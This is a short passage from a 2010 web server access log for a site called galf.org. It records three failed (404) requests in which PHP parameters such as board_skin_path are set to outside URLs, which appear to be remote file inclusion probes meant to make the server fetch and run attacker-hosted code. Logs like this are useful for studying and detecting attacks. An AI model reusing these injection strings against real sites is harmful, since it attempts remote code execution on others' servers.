78.110.50.102 - - [15/Feb/2010:03:33:20 -0800] "GET /logs/access_091130.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [15/Feb/2010:03:33:34 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [15/Feb/2010:03:33:34 -0800] "GET /delete_comment.php?board_skin_path=http://www.cien